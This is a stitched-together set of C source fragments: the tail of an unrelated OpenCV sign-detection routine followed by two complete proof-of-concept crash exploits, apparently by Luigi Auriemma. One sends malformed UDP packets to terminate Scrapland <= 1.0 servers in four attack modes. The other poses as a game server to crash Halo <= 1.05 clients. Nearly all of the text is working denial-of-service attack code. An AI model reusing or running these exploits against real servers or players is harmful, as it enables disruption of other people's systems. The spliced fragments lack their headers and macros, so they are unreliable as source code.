<< "Elapsed time: " << elapsed_seconds.count()*1000 << " ms\n";
cv::Mat output_image = input_image.clone();
cv::Scalar color(0,255,0);
cv::drawContours(output_image, detected_signs, -1, color, 2, 8);
cv::namedWindow("Window", CV_WINDOW_AUTOSIZE);
cv::imshow("Window", output_image);
cv::waitKey(0);
return 0;
}
int main(int argc, char *argv[]) {
struct sockaddr_in peer;
int sd,
len;
u_short port = PORT;
u_char buff[BUFFSZ],
info[] =
"\x7f"
"\x01\x00"
"\x00\x07",
pck[] =
"\x7f"
"\x00\x00"
"\x00\x00"
"\x00",
*p;
setbuf(stdout, NULL);
fputs("\n"
"Scrapland <= 1.0 server termination "VER"\n"
"by Luigi Auriemma\n"
"e-mail: [email protected]\n"
"web: http://aluigi.altervista.org\n"
"\n", stdout);
if(argc < 3) {
printf("\n"
"Usage: %s <attack> <host> [port(%d)]\n"
"\n"
"Attack:\n"
" 1 = big text string (size>SSize)\n"
" 2 = unexistent models (you can test this bug also modifying scrap.cfg)\n"
" 3 = newpos<=size\n"
" 4 = partial packet after small packet (1 or 2 bytes)\n"
"\n", argv[0], port);
exit(1);
}
#ifdef WIN32
WSADATA wsadata;
WSAStartup(MAKEWORD(1,0), &wsadata);
#endif
if(argc > 3) port = atoi(argv[3]);
peer.sin_addr.s_addr = resolv(argv[2]);
peer.sin_port = htons(port);
peer.sin_family = AF_INET;
printf("- target %s : %hu\n",
inet_ntoa(peer.sin_addr), port);
fputs("- request informations\n", stdout);
sd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
if(sd < 0) std_err();
SEND(info, sizeof(info) - 1);
RECV;
printf("\n Server name %s\n", buff + 10);
printf(" Players %d / %d\n\n",
*(u_short *)(buff + 8), *(u_short *)(buff + 6));
if(*(u_short *)(buff + 8) == *(u_short *)(buff + 6)) {
fputs("- Alert: the server is full so this attack will fail\n\n", stdout);
}
fputs("- send BOOM packet\n", stdout);
switch(atoi(argv[1])) {
case 1: {
pck[5] = 0xff; // major than 0x7f
*(u_short *)(pck + 1) = sizeof(pck) - 4;
SEND(pck, sizeof(pck) - 1);
} break;
case 2: {
p = buff;
*p++ = 0x7f;
p += 2; // data size
ADDSHORT(0); // don't know, pck related?
ADDTEXT("Unnamed Player"); // PlayerName
ADDTEXT("unexistent"); // PlayerModel
ADDSHORT(65); // PlayerMaxLife
ADDTEXT("unexistent"); // PilotModel
ADDTEXT("unexistent"); // Motor0Model
ADDTEXT("unexistent"); // Motor1Model
ADDTEXT("unexistent"); // Motor2Model
ADDTEXT("unexistent"); // Motor3Model
ADDTEXT("1,3,0,0,1,0,1"); // WeaponBayList
ADDLONG(0); // PlayerTeamID
*(u_short *)(buff + 1) = (p - buff) - 3;
SEND(buff, p - buff);
} break;
case 3: {
*(u_short *)(pck + 1) = 1; // major than 0
SEND(pck, 5);
} break;
case 4: {
SEND(pck, 1);
sleep(ONESEC);
*(u_short *)(pck + 1) = 0;
SEND(pck, 3);
} break;
default: {
fputs("\nError: wrong attack selected\n\n", stdout);
exit(1);
}
}
fputs("- check server:\n", stdout);
SEND(info, sizeof(info) - 1);
if(timeout(sd) < 0) {
fputs("\nServer IS vulnerable!!!\n\n", stdout);
} else {
fputs("\nServer doesn't seem vulnerable\n\n", stdout);
}
close(sd);
return(0);
}
int main(int argc, char *argv[]) {
int sd,
len,
on = 1,
i,
iver,
psz;
struct sockaddr_in peer;
u_char buff[BUFFSZ + 1],
*pck,
pcklan[] =
"\x00\x00\x00\x00\x00"
"hostname\0" BOOM "\0" /* not only here */
"gamever\0" GAMEVER "\0"
"hostport\0" "\0"
"maxplayers\0" "16\0"
"password\0" "0\0"
"mapname\0" "longest\0"
"dedicated\0" "1\0"
"gamemode\0" "openplaying\0"
"game_classic\0" "0\0"
"numplayers\0" "0\0"
"gametype\0" "CTF\0"
"teamplay\0" "1\0"
"gamevariant\0" "\0"
"fraglimit\0" "3\0"
"player_flags\0" "1943015556,2\0"
"game_flags\0" "65\0"
"\0" "\0",
pckinternet[] =
"\x00\x00\x00\x00\x00"
BOOM "\0"
GAMEVER "\0"
"0\0"
"CTF\0"
"openplaying\0"
"0\0"
"16\0";
setbuf(stdout, NULL);
fputs("\n"
"Halo <= 1.05 broadcast client crash "VER"\n"
"by Luigi Auriemma\n"
"e-mail: [email protected]\n"
"web: http://aluigi.altervista.org\n"
"\n", stdout);
if(argc < 2) {
printf("\n"
"Usage: %s <version>\n"
"\n"
" You must decide what version of the clients you want to crash:\n"
"\n", argv[0]);
for(i = 0; *versions[i]; i++) {
printf(" %s\t%s\n", versions[i][0], versions[i][1]);
}
fputc('\n', stdout);
exit(1);
}
for(iver = 0; versions[iver][0]; iver++) {
if(!strcmp(argv[1], versions[iver][0])) break;
}
if(!versions[iver][0]) {
printf("\nError: you must choose between the versions listed at the beginning\n");
exit(1);
}
printf("- version: %s \t%s\n", versions[iver][0], versions[iver][1]);
for(i = 0; i < (sizeof(pcklan) - 14); i++) {
if(!memcmp(pcklan + i, GAMEVER, 13)) {
memcpy(pcklan + i, versions[iver][1], 13);
break;
}
}
for(i = 0; i < (sizeof(pckinternet) - 14); i++) {
if(!memcmp(pckinternet + i, GAMEVER, 13)) {
memcpy(pckinternet + i, versions[iver][1], 13);
break;
}
}
#ifdef WIN32
WSADATA wsadata;
WSAStartup(MAKEWORD(1,0), &wsadata);
#endif
peer.sin_addr.s_addr = INADDR_ANY;
peer.sin_port = htons(PORT);
peer.sin_family = AF_INET;
psz = sizeof(peer);
sd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
if(sd < 0) std_err();
printf("- bind UDP port %d\n", PORT);
if(setsockopt(sd, SOL_SOCKET, SO_REUSEADDR, (char *)&on, sizeof(on))
< 0) std_err();
if(bind(sd, (struct sockaddr *)&peer, sizeof(peer))
< 0) std_err();
fputs("\nClients:\n", stdout);
while(1) {
len = recvfrom(sd, buff, BUFFSZ, 0, (struct sockaddr *)&peer, &psz);
if(len < 0) std_err();
if(buff[2]) {
printf("PING %s:%hu\n",
inet_ntoa(peer.sin_addr), htons(peer.sin_port));
if(sendto(sd, PING, sizeof(PING) - 1, 0, (struct sockaddr *)&peer, sizeof(peer))
< 0) std_err();
continue;
}
if(len == 10) {
fputs("LAN ", stdout);
pck = pcklan;
len = sizeof(pcklan) - 1;
} else {
fputs("INTERNET ", stdout);
pck = pckinternet;
len = sizeof(pckinternet) - 1;
}
printf("%s:%hu\n",
inet_ntoa(peer.sin_addr), htons(peer.sin_port));
memcpy(pck, buff + 2, 5);
if(sendto(sd, pck, len, 0, (struct sockaddr *)&peer, sizeof(peer))
< 0) std_err();
}
close(sd);
return(0);
}
